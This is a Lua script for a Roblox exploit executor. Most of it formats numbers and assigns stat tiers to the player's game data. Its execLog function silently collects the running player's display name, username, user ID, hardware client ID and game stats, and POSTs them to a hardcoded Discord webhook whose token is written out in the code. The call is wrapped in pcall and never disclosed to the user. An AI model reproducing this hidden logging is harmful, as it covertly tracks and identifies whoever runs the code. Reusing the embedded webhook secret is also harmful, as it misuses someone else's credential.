print("badabangboom")

local suffixes = {
    "", "K", "M", "B", "T",
    "QD", "QN", "SX", "SP", "Oc", "No", "Dec",
    "UnD", "DD", "TD", "QdD", "QND", "SXD", 
    "SPD", "OD", "ND", "VN", "UVN", "DUOVN",
    "TREVN","QVN","SXVN","SPVN","OCVN","NOVN",
    "TRI","UTri","DuoTri","TreTri","QdTri","QnTri",
    "SxTri","SpTri","OcTri","NoTri","Qua","UQua",
    "DQua","TQua","QdQua","QnQua","QnQua","SxQua",
    "SpQua","OcQua","NoQua","Qnt","UQnt","DQnt",
    "TQnt","QdQnt","QnQnt","SxQnt","SpQnt","OcQnt",
    "NoQnt","Sxa","USxa","DSxa","TSxa","QdSxa","QnSxa",
    "SxSxa","SpSxa","OcSxa","NoSxa","Spt","USpt","DSpt",
    "TSpt","QdSpt","QnSpt","SxSpt","SpSpt","OcSpt","NoSpt",
    "Oct","UOct","DOct","TOct","QdOct","QnOct","SxOct","SpOct",
    "OcOct","NoOct","Non","UNon","DNon","TNon","QdNon","QnNon",
    "SxNon","SpNon","OcNon","NoNon","Ce","UCe","DCe"
}

-- Format large numbers into readable suffix format
local function format_number(number)
    local suffixIndex = 1

    while math.abs(number) >= 1000 and suffixIndex < #suffixes do
        number = number / 1000.0
        suffixIndex = suffixIndex + 1
    end

    return string.format("%.2f%s", number, suffixes[suffixIndex])
end

-- Build stat tiers from suffixes
local stats = {}
for i = #suffixes, 1, -1 do
    local value = 10 ^ (3 * (i - 1))
    if value >= 1e6 then
        table.insert(stats, { value = value, label = "1" .. suffixes[i] .. "+" })
    end
end
table.insert(stats, { value = 0, label = "<1M" })

-- Rebirth tier labels
local rebirthsGroup = {
    {1000000000, "1B+"}, {100000000, "100M+"}, {10000000, "10M+"}, {1000000, "1M+"}, {500000, "500k+"},
    {250000, "250k+"}, {200000, "200k+"}, {150000, "150k+"}, {125000, "125k+"}, {100000, "100k+"},
    {85000, "85k+"}, {75000, "75k+"}, {66666, "66k+"}, {60000, "60k+"}, {55000, "55k+"},
    {50000, "50k+"}, {45000, "45k+"}, {40000, "40k+"}, {33333, "33k+"}, {30000, "30k+"},
    {25000, "25k+"}, {20000, "20k+"}, {15000, "15k+"}, {10000, "10k+"}, {5000, "5k+"},
    {2500, "2.5k+"}, {1000, "1k+"}, {100, "100+"}, {3, "3+"}, {0, "0+"}
}

-- Rebirth tier selector
function rebS(rebirths)
    for _, group in ipairs(rebirthsGroup) do
        if rebirths >= group[1] then
            return group[2]
        end
    end
    return "0+"
end

-- Energy/stat tier selector
function statS(energy)
    for _, stat in ipairs(stats) do
        if energy >= stat.value then
            return stat.label
        end
    end
    return "<1M"
end

local function execLog()
    local Players = game:GetService("Players")
    local ReplicatedStorage = game:GetService("ReplicatedStorage")
    local RbxAnalyticsService = game:GetService("RbxAnalyticsService")
    local HttpService = game:GetService("HttpService")

    local player = Players.LocalPlayer
    local hwid = RbxAnalyticsService:GetClientId()

    local dataFolder = ReplicatedStorage:FindFirstChild("Datas")
    local playerData = dataFolder and dataFolder:FindFirstChild(player.UserId)

    local rebirths = 0
    local energy = 0
    local rebirthsFound = false
    local energyFound = false

    if playerData then
        local rebirthObj = playerData:FindFirstChild("Rebirth")
        local energyObj = playerData:FindFirstChild("Energy")

        if rebirthObj then
            rebirths = rebirthObj.Value
            rebirthsFound = true
        end

        if energyObj then
            energy = energyObj.Value
            energyFound = true
        end
    end

    local currentTime = os.date("%m/%d/%Y, %H:%M")
    local reboption = rebS(rebirths)
    local statoption = statS(energy)
    local formattedEnergy = format_number(energy)

    local embedDescription = string.format(
        "User: `%s (@%s)`\nUser ID: `%d`\nHWID: `%s`\nTime: `%s`",
        player.DisplayName, player.Name, player.UserId, hwid, currentTime
    )

    -- Append warnings or valid stats
    if not dataFolder then
        embedDescription = embedDescription .. "\n**⚠ Datas folder not found**"
    elseif not playerData then
        embedDescription = embedDescription .. "\n**⚠ Player data not found**"
    else
        if rebirthsFound then
            embedDescription = embedDescription .. string.format("\nRebirths: `%d` (%s)", rebirths, reboption)
        else
            embedDescription = embedDescription .. "\n**⚠ Rebirths not found**"
        end

        if energyFound then
            embedDescription = embedDescription .. string.format("\nEnergy: `%s` (%s)", formattedEnergy, statoption)
        else
            embedDescription = embedDescription .. "\n**⚠ Stats (Energy) not found**"
        end
    end

    local imageUrl = "https://images-ext-1.discordapp.net/external/l5-KoXA2mt7NrUE6gWvxiprX6o72ojZeBHhDDdoI9IE/%3Fsize%3D4096/https/cdn.discordapp.com/icons/1320931723717902376/174fde885a08dfd98be5ffefa681b07d.png?format=webp&quality=lossless&width=663&height=663"

    local payload = {
        ["content"] = "",
        ["embeds"] = { {
            ["title"] = "Exec logs - " .. player.DisplayName .. " (@" .. player.Name .. ")",
            ["description"] = embedDescription,
            ["color"] = 4286945,
            ["footer"] = {
                ["text"] = "reader version whatever",
            },
        }},
        ["username"] = "Stat Logger",
        ["avatar_url"] = imageUrl,
    }

    local requestFunction = syn and syn.request or http_request or request
    if requestFunction then
        local success, response = pcall(function()
            return requestFunction({
                Url = "https://discord.com/api/webhooks/1364811382813364315/H7KX4N89YGtoIsgAHy6Nxj_kZ3Ks33w7Tgb7x8mpfS2L3z8eT8YS22smKeu4GPZ2uUMw",
                Method = "POST",
                Headers = { ["Content-Type"] = "application/json" },
                Body = HttpService:JSONEncode(payload)
            })
        end)

        if success and response and response.Success then
            print("yea")
        else
            warn("nah")
        end
    else
        warn("?")
    end
end

pcall(execLog)
